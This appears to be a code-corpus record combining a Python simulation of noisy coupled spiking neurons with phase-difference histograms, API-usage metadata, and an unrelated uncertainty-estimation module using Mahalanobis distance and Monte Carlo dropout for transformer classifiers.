I2.append(I_baseline + (dW2+dW3)/dt) else : I1.append(I_baseline) I2.append(I_baseline) next_values = lif_euler(dt, x1[-1], x2[-1], I1[-1], I2[-1]) if next_values[0] > 1 : x1.append(0) nb_spikes += 1 if next_values[1] + gamma*beta > 1 : x2.append(0) else : x2.append(next_values[1]+gamma*beta) elif next_values[1] > 1 : x2.append(0) if next_values[0] + gamma*beta > 1 : x1.append(0) else : x1.append(next_values[0]+gamma*beta) else : x1.append(next_values[0]) x2.append(next_values[1]) # Spike times spike_times, k = [], 0 for i in range(1, len(t)) : if abs(x1[i]-x1[i-1]) > (Vth-Vr)/2 and t[i] >= Dtime : spike_times.append(t[i]) k = i break for i in range(k, len(t)) : if abs(x2[i]-x2[i-1]) > (Vth-Vr)/2 : spike_times.append(t[i]) k = i break for i in range(k, len(t)) : if abs(x1[i+1]-x1[i]) > (Vth-Vr)/2 : spike_times.append(t[i]) break phis.append((spike_times[2] - spike_times[1])/(spike_times[2] - spike_times[0])) """ # Plot trials fig, ax = plt.subplots(2, 1, figsize=(12,5), sharey='row') ax[1].plot(t, x1, label='$V_{1}$', color='#aa3863') ax[1].plot(t, x2, label='$V_{2}$', color='#3b7d86') ax[0].plot(t, I1, label='$I_1$') ax[0].plot(t, I2, label='$I_2$') ax[0].legend(loc='upper right') ax[1].legend(loc='upper right') ax[0].set_title('Noisy input current trial, $\sigma=0.0025, I_{base}=1.5, \gamma=0.4, \\beta=0.1$') #plt.savefig('trial_example_.png', dpi=600) plt.show() """ phis = np.array(phis) % 1 print("phis ", phis) return phis gamma, beta = 0.4, 0.1 Vth, Vr = 1, 0 dt = 0.001 Dtime = 75 maxtime = 80 # CORRELATED sigma_corr = [[0., 0., 0.1], [0., 0., 0.15], [0., 0., 0.2], [0., 0., 0.25], [0., 0., 0.3], [0., 0., 0.4]] phis1_corr = correlations(sigma_corr[0][0], sigma_corr[0][1], sigma_corr[0][2]) phis2_corr = correlations(sigma_corr[1][0], sigma_corr[1][1], sigma_corr[1][2]) phis3_corr = correlations(sigma_corr[2][0], sigma_corr[2][1], sigma_corr[2][2]) phis4_corr = correlations(sigma_corr[3][0], sigma_corr[3][1], sigma_corr[3][2]) phis5_corr = correlations(sigma_corr[4][0], sigma_corr[4][1], sigma_corr[4][2]) phis6_corr = correlations(sigma_corr[5][0], sigma_corr[5][1], sigma_corr[5][2]) # Generate data on phase differences phis1_corr = pd.Series(phis1_corr) phis2_corr = pd.Series(phis2_corr) phis3_corr = pd.Series(phis3_corr) phis4_corr = pd.Series(phis4_corr) phis5_corr = pd.Series(phis5_corr) phi65_corr = pd.Series(phis6_corr) # UNCORRELATED sigma_uncorr = [[0.1, 0.1, 0.], [0.15, 0.15, 0.], [0.2, 0.2, 0.], [0.25, 0.25, 0.], [0.3, 0.3, 0.], [0.4, 0.4, 0.]] phis1_uncorr = correlations(sigma_uncorr[0][0], sigma_uncorr[0][1], sigma_uncorr[0][2]) phis2_uncorr = correlations(sigma_uncorr[1][0], sigma_uncorr[1][1], sigma_uncorr[1][2]) phis3_uncorr = correlations(sigma_uncorr[2][0], sigma_uncorr[2][1], sigma_uncorr[2][2]) phis4_uncorr = correlations(sigma_uncorr[3][0], sigma_uncorr[3][1], sigma_uncorr[3][2]) phis5_uncorr = correlations(sigma_uncorr[4][0], sigma_uncorr[4][1], sigma_uncorr[4][2]) phis6_uncorr = correlations(sigma_uncorr[5][0], sigma_uncorr[5][1], sigma_uncorr[5][2]) # Generate data on phase differences phis1_uncorr = pd.Series(phis1_uncorr) phis2_uncorr = pd.Series(phis2_uncorr) phis3_uncorr = pd.Series(phis3_uncorr) phis4_uncorr = pd.Series(phis4_uncorr) phis5_uncorr = pd.Series(phis5_uncorr) phi65_uncorr = pd.Series(phis6_uncorr) fig, ax = plt.subplots(2, 3, figsize=(10, 5), sharex='col', sharey='row') plt.ylim(0, 1000) fig.suptitle('Distribution of phase difference, correlated vs uncorrelated') ax[1, 0].set_xlabel('Phase Difference $\phi$') ax[1, 1].set_xlabel('Phase Difference $\phi$') ax[1, 2].set_xlabel('Phase Difference $\phi$') ax[0, 0].set_ylabel(f'$\phi$ (t={Dtime})') ax[1, 0].set_ylabel(f'$\phi$ (t={Dtime})') ax[0, 0].set_ylim(0, 1000) ax[1, 0].set_ylim(0, 1000) text_plot1 = f'$\sigma_1$={sigma_uncorr[0][0]}, $\sigma_2$={sigma_uncorr[0][1]} and $\sigma_3$={sigma_corr[0][2]}.' ax[0, 0].hist(phis1_corr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[2], rwidth=0.9, label='correlated') ax[0, 0].hist(phis1_uncorr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[-3], rwidth=0.9, label='uncorrelated') ax[0, 0].legend(loc='upper right', prop={'size': 8}) ax[0, 0].set_title(text_plot1, size=10) text_plot2 = f'$\sigma_1$={sigma_uncorr[1][0]}, $\sigma_2$={sigma_uncorr[1][1]} and $\sigma_3$={sigma_corr[1][2]}.' ax[0, 1].hist(phis2_corr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[2], rwidth=0.9, label='correlated') ax[0, 1].hist(phis2_uncorr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[-3], rwidth=0.9, label='uncorrelated') ax[0, 1].legend(loc='upper right', prop={'size': 8}) ax[0, 1].set_title(text_plot2, size=10) text_plot3 = f'$\sigma_1$={sigma_uncorr[2][0]}, $\sigma_2$={sigma_uncorr[2][1]} and $\sigma_3$={sigma_corr[2][2]}.' ax[0, 2].hist(phis3_corr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[2], rwidth=0.9, label='correlated') ax[0, 2].hist(phis3_uncorr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[-3], rwidth=0.9, label='uncorrelated') ax[0, 2].legend(loc='upper right', prop={'size': 8}) ax[0, 2].set_title(text_plot3, size=10) text_plot4 = f'$\sigma_1$={sigma_uncorr[3][0]}, $\sigma_2$={sigma_uncorr[3][1]} and $\sigma_3$={sigma_corr[3][2]}.' ax[1, 0].hist(phis4_corr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[2], rwidth=0.9, label='correlated') ax[1, 0].hist(phis4_uncorr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[-3], rwidth=0.9, label='uncorrelated') ax[1, 0].legend(loc='upper right', prop={'size': 8}) ax[1, 0].set_title(text_plot4, size=10) text_plot5 = f'$\sigma_1$={sigma_uncorr[4][0]}, $\sigma_2$={sigma_uncorr[4][1]} and $\sigma_3$={sigma_corr[4][2]}.' ax[1, 1].hist(phis5_corr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[2], rwidth=0.9, label='correlated') ax[1, 1].hist(phis5_uncorr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[-3], rwidth=0.9, label='uncorrelated') ax[1, 1].legend(loc='upper right', prop={'size': 8}) ax[1, 1].set_title(text_plot5, size=10) text_plot6 = f'$\sigma_1$={sigma_uncorr[5][0]}, $\sigma_2$={sigma_uncorr[5][1]} and $\sigma_3$={sigma_corr[5][2]}.' ax[1, 2].hist(phis6_corr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[2], rwidth=0.9, label='correlated') ax[1, 2].hist(phis6_uncorr, bins=np.linspace(0, 1, 22), alpha=0.5, edgecolor='k', color=c[-3], rwidth=0.9, label='uncorrelated') ax[1, 2].legend(loc='upper right', prop={'size': 8}) ax[1, 2].set_title(text_plot6, size=10) plt.tight_layout() #plt.savefig('un_vs_correlated.svg') plt.show()
[ "numpy.random.seed", "matplotlib.pyplot.show", "math.sqrt", "matplotlib.pyplot.ylim", "numpy.random.randn", "matplotlib.pyplot.subplots", "numpy.array", "pandas.Series", "numpy.linspace", "matplotlib.pyplot.tight_layout" ]
[((436, 452), 'numpy.random.seed', 'np.random.seed', ([], {}), '()\n', (450, 452), True, 'import numpy as np\n'), ((4708, 4729), 'pandas.Series', 'pd.Series', (['phis1_corr'], {}), '(phis1_corr)\n', (4717, 4729), True, 'import pandas as pd\n'), ((4743, 4764), 'pandas.Series', 'pd.Series', (['phis2_corr'], {}), '(phis2_corr)\n', (4752, 4764), True, 'import pandas as pd\n'), ((4778, 4799), 'pandas.Series', 'pd.Series', (['phis3_corr'], {}), '(phis3_corr)\n', (4787, 4799), True, 'import pandas as pd\n'), ((4813, 4834), 'pandas.Series', 'pd.Series', (['phis4_corr'], {}), '(phis4_corr)\n', (4822, 4834), True, 'import pandas as pd\n'), ((4848, 4869), 'pandas.Series', 'pd.Series', (['phis5_corr'], {}), '(phis5_corr)\n', (4857, 4869), True, 'import pandas as pd\n'), ((4883, 4904), 'pandas.Series', 'pd.Series', (['phis6_corr'], {}), '(phis6_corr)\n', (4892, 4904), True, 'import pandas as pd\n'), ((5619, 5642), 'pandas.Series', 'pd.Series', (['phis1_uncorr'], {}), '(phis1_uncorr)\n', (5628, 5642), True, 'import pandas as pd\n'), ((5658, 5681), 'pandas.Series', 'pd.Series', (['phis2_uncorr'], {}), '(phis2_uncorr)\n', (5667, 5681), True, 'import pandas as pd\n'), ((5697, 5720), 'pandas.Series', 'pd.Series', (['phis3_uncorr'], {}), '(phis3_uncorr)\n', (5706, 5720), True, 'import pandas as pd\n'), ((5736, 5759), 'pandas.Series', 'pd.Series', (['phis4_uncorr'], {}), '(phis4_uncorr)\n', (5745, 5759), True, 'import pandas as pd\n'), ((5775, 5798), 'pandas.Series', 'pd.Series', (['phis5_uncorr'], {}), '(phis5_uncorr)\n', (5784, 5798), True, 'import pandas as pd\n'), ((5814, 5837), 'pandas.Series', 'pd.Series', (['phis6_uncorr'], {}), '(phis6_uncorr)\n', (5823, 5837), True, 'import pandas as pd\n'), ((5849, 5912), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)', '(3)'], {'figsize': '(10, 5)', 'sharex': '"""col"""', 'sharey': '"""row"""'}), "(2, 3, figsize=(10, 5), sharex='col', sharey='row')\n", (5861, 5912), True, 'import matplotlib.pyplot as plt\n'), ((5913, 5930), 'matplotlib.pyplot.ylim', 'plt.ylim', (['(0)', '(1000)'], {}), '(0, 1000)\n', (5921, 5930), True, 'import matplotlib.pyplot as plt\n'), ((9070, 9088), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (9086, 9088), True, 'import matplotlib.pyplot as plt\n'), ((9126, 9136), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (9134, 9136), True, 'import matplotlib.pyplot as plt\n'), ((685, 702), 'numpy.random.randn', 'np.random.randn', ([], {}), '()\n', (700, 702), True, 'import numpy as np\n'), ((730, 747), 'numpy.random.randn', 'np.random.randn', ([], {}), '()\n', (745, 747), True, 'import numpy as np\n'), ((775, 792), 'numpy.random.randn', 'np.random.randn', ([], {}), '()\n', (790, 792), True, 'import numpy as np\n'), ((3921, 3935), 'numpy.array', 'np.array', (['phis'], {}), '(phis)\n', (3929, 3935), True, 'import numpy as np\n'), ((6439, 6460), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (6450, 6460), True, 'import numpy as np\n'), ((6565, 6586), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (6576, 6586), True, 'import numpy as np\n'), ((6902, 6923), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (6913, 6923), True, 'import numpy as np\n'), ((7028, 7049), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (7039, 7049), True, 'import numpy as np\n'), ((7365, 7386), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (7376, 7386), True, 'import numpy as np\n'), ((7491, 7512), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (7502, 7512), True, 'import numpy as np\n'), ((7828, 7849), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (7839, 7849), True, 'import numpy as np\n'), ((7954, 7975), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (7965, 7975), True, 'import numpy as np\n'), ((8291, 8312), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (8302, 8312), True, 'import numpy as np\n'), ((8417, 8438), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (8428, 8438), True, 'import numpy as np\n'), ((8754, 8775), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (8765, 8775), True, 'import numpy as np\n'), ((8880, 8901), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(22)'], {}), '(0, 1, 22)\n', (8891, 8901), True, 'import numpy as np\n'), ((671, 684), 'math.sqrt', 'math.sqrt', (['dt'], {}), '(dt)\n', (680, 684), True, 'import math as math\n'), ((716, 729), 'math.sqrt', 'math.sqrt', (['dt'], {}), '(dt)\n', (725, 729), True, 'import math as math\n'), ((761, 774), 'math.sqrt', 'math.sqrt', (['dt'], {}), '(dt)\n', (770, 774), True, 'import math as math\n')]
import torch from ue4nlp.dropconnect_mc import ( LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout, ) from ue4nlp.dropout_mc import DropoutMC, activate_mc_dropout, convert_to_mc_dropout from utils.utils_dropout import set_last_dropout, get_last_dropout, set_last_dropconnect from utils.utils_heads import ( ElectraClassificationHeadIdentityPooler, BertClassificationHeadIdentityPooler, ElectraNERHeadIdentityPooler, XLNetClassificationHeadIdentityPooler, ) from utils.utils_inference import ( is_custom_head, unpad_features, pad_scores ) from ue4nlp.mahalanobis_distance import ( mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance ) import numpy as np import copy from tqdm import tqdm import time import logging log = logging.getLogger() def convert_dropouts(model, ue_args): if ue_args.dropout_type == "MC": dropout_ctor = lambda p, activate: DropoutMC( p=ue_args.inference_prob, activate=False ) elif ue_args.dropout_type == "DC_MC": dropout_ctor = lambda linear, activate: LinearDropConnectMC( linear=linear, p_dropconnect=ue_args.inference_prob, activate=activate ) else: raise ValueError(f"Wrong dropout type: {ue_args.dropout_type}") if (ue_args.dropout_subs == "all") and (ue_args.dropout_type == "DC_MC"): convert_to_mc_dropconnect( model.electra.encoder, {"Linear": dropout_ctor} ) # TODO: check encoder or all dropouts ? hide_dropout(model.electra.encoder) elif (ue_args.dropout_subs == "last") and (ue_args.dropout_type == "DC_MC"): set_last_dropconnect(model, dropout_ctor) hide_dropout(model.classifier) elif ue_args.dropout_subs == "last": set_last_dropout(model, dropout_ctor(p=ue_args.inference_prob, activate=False)) elif ue_args.dropout_subs == "all": convert_to_mc_dropout(model, {"Dropout": dropout_ctor}) else: raise ValueError(f"Wrong ue args {ue_args.dropout_subs}") class UeEstimatorMSD: def __init__( self, cls, config, ue_args, eval_metric, calibration_dataset, train_dataset ): self.cls = cls self.ue_args = ue_args self.calibration_dataset = calibration_dataset self.eval_metric = eval_metric self.train_dataset = train_dataset self.config = config def fit_ue(self, X, y=None, X_test=None): cls = self.cls model = self.cls._auto_model log.info("****************Start fitting covariance and centroids **************") if y is None: y = self._exctract_labels(X) self._replace_model_head() X_features = self._exctract_features(X) self.class_cond_centroids = self._fit_centroids(X_features, y) self.class_cond_covarince = self._fit_covariance(X_features, y) self._restore_model_head() log.info("**************Done.**********************") def _fit_covariance(self, X, y, class_cond=True): if class_cond: return compute_covariance(self.class_cond_centroids, X, y, class_cond) return compute_covariance(self.train_centroid, X, y, class_cond) def _fit_centroids(self, X, y, class_cond=True): return compute_centroids(X, y, class_cond) def _replace_model_head(self): cls = self.cls model = self.cls._auto_model self.old_classifier = copy.deepcopy(model.classifier) use_paper_version = self.ue_args.get("use_paper_version", False) use_activation = not use_paper_version if is_custom_head(model): model.classifier = ElectraClassificationHeadIdentityPooler(model.classifier, use_activation) elif "xlnet" in self.config.model.model_name_or_path: # so XLNet hasn't classifier, we replace sequence_summary and logits_proj self.cls.model.logits_proj = XLNetClassificationHeadIdentityPooler() else: model.classifier = BertClassificationHeadIdentityPooler(model.classifier) def _restore_model_head(self): model = self.cls._auto_model model.classifier = self.old_classifier def _exctract_labels(self, X): return np.asarray([example["label"] for example in X]) def _exctract_features(self, X): cls = self.cls model = self.cls._auto_model try: X = X.remove_columns("label") except: X.dataset = X.dataset.remove_columns("label") X_features = cls.predict(X, apply_softmax=False, return_preds=False)[0] return X_features def _calc_distinctivness_score(self, full_mahalanobis_distance, eval_labels, eval_results): start_unc = time.time() min_mahalanobis_distance = np.min(full_mahalanobis_distance, axis=-1) # calc penalty penalty = self.config.mixup.margin * np.where( eval_labels == np.argmin(full_mahalanobis_distance, axis=-1), 0, 1 ) dist_score = np.log10( self.config.mixup.beta1 * penalty + self.config.mixup.beta2 * min_mahalanobis_distance ) # after calc uncertainty score max_probs = np.max( np.mean(np.asarray(eval_results["sampled_probabilities"]), axis=0), axis=-1 ) uncertainty_score = ( self.config.mixup.gamma1 / max_probs + self.config.mixup.gamma2 * dist_score ) end_unc = time.time() eval_results["uncertainty_score"] = uncertainty_score.tolist() return eval_results, end_unc - start_unc def _predict_with_fitted_cov(self, X, y, eval_results): cls = self.cls model = self.cls._auto_model self._replace_model_head() log.info("****************Compute MD with fitted covariance and centroids **************") start = time.time() if y is None: y = self._exctract_labels(X) X_features = self._exctract_features(X) end = time.time() md, inf_time = mahalanobis_distance(None, None, X_features, self.class_cond_centroids, self.class_cond_covarince, True) sum_inf_time = inf_time + (end - start) eval_results["mahalanobis_distance"] = md.tolist() self._restore_model_head() log.info("**************Done.**********************") return eval_results, md, sum_inf_time def _activate_dropouts(self, model): ue_args = self.ue_args log.info("******Perform stochastic inference...*******") if ue_args.dropout_type == "DC_MC": activate_mc_dropconnect(model, activate=True, random=ue_args.inference_prob) else: convert_dropouts(model, ue_args) activate_mc_dropout(model, activate=True, random=ue_args.inference_prob) if ue_args.use_cache: log.info("Caching enabled.") model.enable_cache() return model def _deactivate_dropouts(self, model): activate_mc_dropout(model, activate=False) activate_mc_dropconnect(model, activate=False) return model def _predict_mc(self, X, y): ue_args = self.ue_args eval_metric = self.eval_metric model = self.cls._auto_model start = time.time() model = self._activate_dropouts(model) eval_results = {} eval_results["sampled_probabilities"] = [] eval_results["sampled_answers"] = [] log.info("****************Start runs**************") for i in tqdm(range(ue_args.committee_size)): preds, probs = self.cls.predict(X)[:2] eval_results["sampled_probabilities"].append(probs.tolist()) eval_results["sampled_answers"].append(preds.tolist()) if ue_args.eval_passes: eval_score = eval_metric.compute( predictions=preds, references=true_labels ) log.info(f"Eval score: {eval_score}") end = time.time() log.info("**************Done.********************") model = self._deactivate_dropouts(model) return eval_results, end - start def _predict_msd(self, X, y): ue_args = self.ue_args model = self.cls._auto_model if y is None: y = self._exctract_labels(X) eval_results, mc_time = self._predict_mc(X, y) eval_results, full_mahalanobis_distance, md_time = self._predict_with_fitted_cov(X, y, eval_results) eval_results["eval_labels"] = y # so now we have sampled probs and mahalanobis distances in eval_preds # we have to calc distinctivness score and uncertainty scores eval_results, unc_time = self._calc_distinctivness_score(full_mahalanobis_distance, y, eval_results) sum_inf_time = mc_time + md_time + unc_time eval_results["ue_time"] = sum_inf_time log.info(f"UE time: {sum_inf_time}") return eval_results def __call__(self, X, y): return self._predict_msd(X, y) class UeEstimatorMSDNer: def __init__( self, cls, config, ue_args, eval_metric, calibration_dataset, train_dataset ): self.cls = cls self.ue_args = ue_args self.calibration_dataset = calibration_dataset self.eval_metric = eval_metric self.train_dataset = train_dataset self.config = config def fit_ue(self, X, y=None, X_test=None): cls = self.cls model = self.cls._auto_model log.info("****************Start fitting covariance and centroids **************") if y is None: y, y_shape = self._exctract_labels(X) self._replace_model_head() X_features = self._exctract_features(X) self.class_cond_centroids = self._fit_centroids(X_features, y) self.class_cond_covarince = self._fit_covariance(X_features, y) self._restore_model_head() log.info("**************Done.**********************") def _fit_covariance(self, X, y, class_cond=True): if class_cond: return compute_covariance(self.class_cond_centroids, X, y, class_cond) return compute_covariance(self.train_centroid, X, y, class_cond) def _fit_centroids(self, X, y, class_cond=True): return compute_centroids(X, y, class_cond) def _replace_model_head(self): cls = self.cls model = self.cls._auto_model self.old_classifier = copy.deepcopy(model.classifier) use_paper_version = self.ue_args.get("use_paper_version", False) use_activation = not use_paper_version if is_custom_head(model): model.classifier = ElectraNERHeadIdentityPooler(model.classifier, use_activation) else: model.classifier = BertClassificationHeadIdentityPooler(model.classifier) def _restore_model_head(self): model = self.cls._auto_model model.classifier = self.old_classifier def _exctract_labels(self, X): y = np.asarray([example["labels"] for example in X]) y_shape = y.shape return y.reshape(-1), y_shape def _exctract_features(self, X): cls = self.cls model = self.cls._auto_model try: X = X.remove_columns("labels") except: X.dataset = X.dataset.remove_columns("labels") X_features = cls.predict(X, apply_softmax=False, return_preds=False)[0] X_features = X_features.reshape(-1, X_features.shape[-1]) return X_features def _calc_distinctivness_score(self, full_mahalanobis_distance, eval_labels, eval_shape, eval_results): start_unc = time.time() min_mahalanobis_distance = np.min(full_mahalanobis_distance, axis=-1).reshape( eval_shape ) # calc penalty penalty = self.config.mixup.margin * np.where( eval_labels == np.argmin(full_mahalanobis_distance, axis=-1).reshape(eval_shape), 0, 1, ) dist_score = np.log10( self.config.mixup.beta1 * penalty + self.config.mixup.beta2 * min_mahalanobis_distance ) # after calc uncertainty score max_probs = np.max( np.mean(np.asarray(eval_results["sampled_probabilities"]), axis=0), axis=-1 ) uncertainty_score = ( self.config.mixup.gamma1 / max_probs + self.config.mixup.gamma2 * dist_score ) end_unc = time.time() eval_results["uncertainty_score"] = uncertainty_score.tolist() return eval_results, end_unc - start_unc def _predict_with_fitted_cov(self, X, y, eval_results): cls = self.cls model = self.cls._auto_model self._replace_model_head() log.info("****************Compute MD with fitted covariance and centroids **************") start = time.time() y_pad, y_shape = self._exctract_labels(X) X_features = self._exctract_features(X) end = time.time() md, inf_time = mahalanobis_distance(None, None, X_features, self.class_cond_centroids, self.class_cond_covarince, True) sum_inf_time = inf_time + (end - start) eval_results["mahalanobis_distance"] = md.tolist() self._restore_model_head() log.info("**************Done.**********************") return eval_results, md, sum_inf_time def _activate_dropouts(self, model): ue_args = self.ue_args log.info("******Perform stochastic inference...*******") if ue_args.dropout_type == "DC_MC": activate_mc_dropconnect(model, activate=True, random=ue_args.inference_prob) else: convert_dropouts(model, ue_args) activate_mc_dropout(model, activate=True, random=ue_args.inference_prob) if ue_args.use_cache: log.info("Caching enabled.") model.enable_cache() return model def _deactivate_dropouts(self, model): activate_mc_dropout(model, activate=False) activate_mc_dropconnect(model, activate=False) return model def _predict_mc(self, X, y): ue_args = self.ue_args eval_metric = self.eval_metric model = self.cls._auto_model start = time.time() model = self._activate_dropouts(model) eval_results = {} eval_results["sampled_probabilities"] = [] eval_results["sampled_answers"] = [] log.info("****************Start runs**************") for i in tqdm(range(ue_args.committee_size)): preds, probs = self.cls.predict(X)[:2] eval_results["sampled_probabilities"].append(probs.tolist()) eval_results["sampled_answers"].append(preds.tolist()) if ue_args.eval_passes: eval_score = eval_metric.compute( predictions=preds, references=true_labels ) log.info(f"Eval score: {eval_score}") end = time.time() log.info("**************Done.********************") model = self._deactivate_dropouts(model) return eval_results, end - start def _predict_msd(self, X, y): ue_args = self.ue_args model = self.cls._auto_model y_pad, y_shape = self._exctract_labels(X) eval_results, mc_time = self._predict_mc(X, y) eval_results, full_mahalanobis_distance, md_time = self._predict_with_fitted_cov(X, y, eval_results) eval_results["eval_labels"] = y # so now we have sampled probs and mahalanobis distances in eval_preds # we have to calc distinctivness score and uncertainty scores eval_results, unc_time = self._calc_distinctivness_score(full_mahalanobis_distance, y_pad, y_shape, eval_results) sum_inf_time = mc_time + md_time + unc_time eval_results["ue_time"] = sum_inf_time log.info(f"UE time: {sum_inf_time}") return eval_results def __call__(self, X, y): return self._predict_msd(X, y)
[ "ue4nlp.dropconnect_mc.activate_mc_dropconnect", "numpy.argmin", "ue4nlp.mahalanobis_distance.compute_covariance", "ue4nlp.mahalanobis_distance.compute_centroids", "utils.utils_heads.BertClassificationHeadIdentityPooler", "utils.utils_inference.is_custom_head", "ue4nlp.dropconnect_mc.convert_to_mc_dropconnect", "numpy.log10", "ue4nlp.dropconnect_mc.LinearDropConnectMC", "ue4nlp.dropout_mc.activate_mc_dropout", "copy.deepcopy", "utils.utils_heads.XLNetClassificationHeadIdentityPooler", "numpy.asarray", "numpy.min", "ue4nlp.dropout_mc.convert_to_mc_dropout", "utils.utils_heads.ElectraClassificationHeadIdentityPooler", "utils.utils_dropout.set_last_dropconnect", "ue4nlp.dropout_mc.DropoutMC", "utils.utils_heads.ElectraNERHeadIdentityPooler", "ue4nlp.dropconnect_mc.hide_dropout", "time.time", "ue4nlp.mahalanobis_distance.mahalanobis_distance", "logging.getLogger" ]
[((893, 912), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (910, 912), False, 'import logging\n'), ((1482, 1556), 'ue4nlp.dropconnect_mc.convert_to_mc_dropconnect', 'convert_to_mc_dropconnect', (['model.electra.encoder', "{'Linear': dropout_ctor}"], {}), "(model.electra.encoder, {'Linear': dropout_ctor})\n", (1507, 1556), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((1628, 1663), 'ue4nlp.dropconnect_mc.hide_dropout', 'hide_dropout', (['model.electra.encoder'], {}), '(model.electra.encoder)\n', (1640, 1663), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((3316, 3373), 'ue4nlp.mahalanobis_distance.compute_covariance', 'compute_covariance', (['self.train_centroid', 'X', 'y', 'class_cond'], {}), '(self.train_centroid, X, y, class_cond)\n', (3334, 3373), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((3451, 3486), 'ue4nlp.mahalanobis_distance.compute_centroids', 'compute_centroids', (['X', 'y', 'class_cond'], {}), '(X, y, class_cond)\n', (3468, 3486), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((3620, 3651), 'copy.deepcopy', 'copy.deepcopy', (['model.classifier'], {}), '(model.classifier)\n', (3633, 3651), False, 'import copy\n'), ((3792, 3813), 'utils.utils_inference.is_custom_head', 'is_custom_head', (['model'], {}), '(model)\n', (3806, 3813), False, 'from utils.utils_inference import is_custom_head, unpad_features, pad_scores\n'), ((4424, 4471), 'numpy.asarray', 'np.asarray', (["[example['label'] for example in X]"], {}), "([example['label'] for example in X])\n", (4434, 4471), True, 'import numpy as np\n'), ((4948, 4959), 'time.time', 'time.time', ([], {}), '()\n', (4957, 4959), False, 'import time\n'), ((4995, 5037), 'numpy.min', 'np.min', (['full_mahalanobis_distance'], {'axis': '(-1)'}), '(full_mahalanobis_distance, axis=-1)\n', (5001, 5037), True, 'import numpy as np\n'), ((5226, 5326), 'numpy.log10', 'np.log10', (['(self.config.mixup.beta1 * penalty + self.config.mixup.beta2 *\n min_mahalanobis_distance)'], {}), '(self.config.mixup.beta1 * penalty + self.config.mixup.beta2 *\n min_mahalanobis_distance)\n', (5234, 5326), True, 'import numpy as np\n'), ((5669, 5680), 'time.time', 'time.time', ([], {}), '()\n', (5678, 5680), False, 'import time\n'), ((6082, 6093), 'time.time', 'time.time', ([], {}), '()\n', (6091, 6093), False, 'import time\n'), ((6219, 6230), 'time.time', 'time.time', ([], {}), '()\n', (6228, 6230), False, 'import time\n'), ((6263, 6371), 'ue4nlp.mahalanobis_distance.mahalanobis_distance', 'mahalanobis_distance', (['None', 'None', 'X_features', 'self.class_cond_centroids', 'self.class_cond_covarince', '(True)'], {}), '(None, None, X_features, self.class_cond_centroids,\n self.class_cond_covarince, True)\n', (6283, 6371), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((7258, 7300), 'ue4nlp.dropout_mc.activate_mc_dropout', 'activate_mc_dropout', (['model'], {'activate': '(False)'}), '(model, activate=False)\n', (7277, 7300), False, 'from ue4nlp.dropout_mc import DropoutMC, activate_mc_dropout, convert_to_mc_dropout\n'), ((7309, 7355), 'ue4nlp.dropconnect_mc.activate_mc_dropconnect', 'activate_mc_dropconnect', (['model'], {'activate': '(False)'}), '(model, activate=False)\n', (7332, 7355), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((7535, 7546), 'time.time', 'time.time', ([], {}), '()\n', (7544, 7546), False, 'import time\n'), ((8261, 8272), 'time.time', 'time.time', ([], {}), '()\n', (8270, 8272), False, 'import time\n'), ((10462, 10519), 'ue4nlp.mahalanobis_distance.compute_covariance', 'compute_covariance', (['self.train_centroid', 'X', 'y', 'class_cond'], {}), '(self.train_centroid, X, y, class_cond)\n', (10480, 10519), False, 'from ue4nlp.mahalanobis_distance import mahalanobis_distance, mahalanobis_distance_relative, mahalanobis_distance_marginal, compute_centroids, compute_covariance\n'), ((10597, 10632), 'ue4nlp.mahalanobis_distance.compute_centroids', 'compute_centroids', (['X', 'y', 'class_cond'], {}), '(X, y, 